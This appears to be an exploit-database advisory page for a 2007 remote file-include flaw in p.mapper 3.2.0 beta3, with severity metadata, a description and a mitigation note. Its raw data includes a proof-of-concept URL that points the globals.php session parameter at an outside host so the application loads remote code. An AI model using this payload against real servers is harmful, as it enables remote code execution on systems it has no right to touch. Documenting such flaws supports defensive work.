header-logo
Suggest Exploit
vendor:
p.mapper
by:
Unknown
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: p.mapper
Affected Version From: 3.2.0 beta3
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:p.mapper:p.mapper:3.2.0_beta3
Metasploit:
Other Scripts:
Platforms Tested: Unknown
2007

p.mapper Remote File Include Vulnerabilities

p.mapper is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize user-supplied data and validate input before using it in file inclusion functions.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26614/info

p.mapper is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

These issues affect p.mapper 3.2.0 beta3; other versions may also be vulnerable.

http://www.example.com/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=http://www.example2.com

Navigation

Suggest Exploit

Services By CQR